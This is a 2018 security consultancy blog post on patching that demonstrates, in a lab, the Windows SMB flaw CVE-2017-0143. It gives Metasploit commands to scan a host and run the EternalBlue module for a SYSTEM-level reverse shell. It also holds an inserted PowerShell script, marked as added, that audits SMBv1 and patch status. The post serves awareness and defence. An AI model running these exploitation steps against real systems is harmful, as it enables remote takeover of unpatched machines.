24 July, 2018

Windows SMB Vulnerability

‘Patching’ is something you do when there is a hole in your trousers or top. In the technology world it means much the same thing, except that what gets patched is the operating system or a computer program.

More often than not, applying updates to a personal computer is a trivial endeavour. For businesses, however, keeping software up to date is vital in order to mitigate attacks and reduce the attack surface.

The complexity and impact of keeping systems up to date vary across industries. For example, running Windows XP or Windows 7 in the X-ray department of a hospital without installing the latest updates leaves the organisation at risk. IT departments in organisations like this tend to refrain from updating such systems because an update or upgrade is highly likely to make the dependent software incompatible or troublesome.

Secrutiny’s findings

Of the 500,000+ endpoints Secrutiny has audited in the last year, 100% of organisations had inconsistencies in their operating system builds alone.

One organisation we audited in the past was running Windows 7 v6.1 Build 7601 SP1 x64 as the majority of its active operating systems across the business. The problem with this version is that it has several known vulnerabilities, as listed on the CVE (Common Vulnerabilities and Exposures) website.

Screenshot of the CVE (Common Vulnerabilities and Exposures) website.

Demonstration of exploiting the operating system

The following demonstrates exploiting the operating system using CVE-2017-0143 (Windows SMB Remote Code Execution Vulnerability) as an unprivileged user, to gain privileged access:

SET UP: VICTIM
  OS               Windows 7 Home Basic x86 SP1
  RAM              4 GB
  Processor count  1
  Cores            4

SET UP: ATTACKER
  OS               Kali Linux x64
  RAM              4 GB
  Processor count  1
  Cores            4

STEP 1:

Firstly, we run a scanner within Metasploit to determine whether the target is likely to be vulnerable. Open a terminal within Kali and run the Metasploit scanner using the commands listed below.

  • msfconsole
  • use auxiliary/scanner/smb/smb_ms17_010
  • options
    Set RHOSTS to the IP address of the target.
  • set RHOSTS 192.168.38.128
  • run

STEP 2:

From the output of the scan, it is likely that the target is vulnerable. We can test this theory by running the exploit against the machine.

  • use exploit/windows/smb/ms17_010_eternalblue
  • options
    Set RHOST to the IP address of the target.
  • set RHOST 192.168.38.128

STEP 3:

Now we can simply run the exploit, which creates a privileged reverse shell.

Note: The cmd.exe process will not show up in the target machine’s Task Manager because the payload is injected into spoolsv.exe (spoolsv.exe is responsible for handling print and fax jobs on a Windows operating system). The Windows Task Manager image shows that spoolsv.exe is running as SYSTEM.

To protect against this and similar vulnerabilities, it is important to install critical Windows updates. The affected versions are:
  • Windows Vista SP2
  • Windows 7 SP1
  • Windows 8.1
  • Windows RT 8.1
  • Windows 10 Gold, 1511, and 1607
  • Windows Server 2008 SP2 and R2 SP1
  • Windows Server 2012 Gold and R2
  • Windows Server 2016
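As an added defensive check (example code, not part of the original post or Secrutiny’s audit tooling), the following PowerShell script reports, for the host it runs on, the OS build, whether the SMBv1 server that CVE-2017-0143 targets is enabled, whether TCP/445 is listening, and whether a given hotfix is installed. It assumes Windows PowerShell 3.0 or later and an elevated prompt; the KB identifier is a placeholder because the post does not name one.

```powershell
# Added example, not code from the original post. Audits the local Windows host for
# MS17-010 / CVE-2017-0143 exposure: OS build, SMBv1 server state (the protocol the
# exploit above targets) and presence of a hotfix. KB id is a PLACEHOLDER. Run elevated.
param(
    [string]$HotfixId = 'KB0000000',   # PLACEHOLDER: MS17-010 KB for this OS version
    [switch]$DisableSmb1               # apply Microsoft's documented SMBv1 mitigation
)

$os = Get-CimInstance -ClassName Win32_OperatingSystem

# Windows 8.1 / Server 2012 R2 and later expose the SMB server cmdlets; Windows 7 /
# Server 2008 R2 only have the LanmanServer registry value (absent means enabled).
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$hasSmbCmdlets = [bool](Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue)
if ($hasSmbCmdlets) {
    $smb1Enabled = (Get-SmbServerConfiguration).EnableSMB1Protocol
} else {
    $value = (Get-ItemProperty -Path $lanman -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    $smb1Enabled = ($null -eq $value) -or ($value -ne 0)
}

# Get-HotFix reads Win32_QuickFixEngineering; an absent id yields no object.
$patched = [bool](Get-HotFix -Id $HotfixId -ErrorAction SilentlyContinue)

# Is anything listening on TCP/445? netstat is used because Get-NetTCPConnection
# is not available on Windows 7.
$smbListening = [bool](netstat -an | Select-String -Pattern ':445\s+.*LISTENING')

$report = [pscustomobject]@{
    ComputerName  = $env:COMPUTERNAME
    OS            = $os.Caption
    Build         = "$($os.Version) SP$($os.ServicePackMajorVersion)"
    SMB1Enabled   = $smb1Enabled
    Port445Listen = $smbListening
    HotfixPresent = $patched
    Exposed       = ($smb1Enabled -and $smbListening -and -not $patched)
}
$report | Format-List

if ($DisableSmb1 -and $smb1Enabled) {
    if ($hasSmbCmdlets) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        # Windows 7 / 2008 R2: the registry change takes effect after a restart.
        Set-ItemProperty -Path $lanman -Name SMB1 -Type DWord -Value 0 -Force
    }
    Write-Output 'SMBv1 server disabled; a restart is required on Windows 7 / 2008 R2.'
}
```

Run across an estate (for example via remoting or a management agent) and collect the Exposed field to build the kind of susceptibility list the audit below describes.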

A Cyber Risk Audit will determine which machines are susceptible to the SMB vulnerability.

The Cyber Risk Audit provides a factual view of internal risk and breach susceptibility by assessing your organisation’s IT environment, informing defined and evidenced security improvement priorities.

While studying Computer Science at Kent University, Reehan Aslam worked at Secrutiny Ltd for a year as a Technical Analyst.

Reehan is currently centred on defending organisations and highlighting security flaws and risk within networks and applications.

His interests include Static Analysis, Network Traffic Analysis and Digital Forensics.
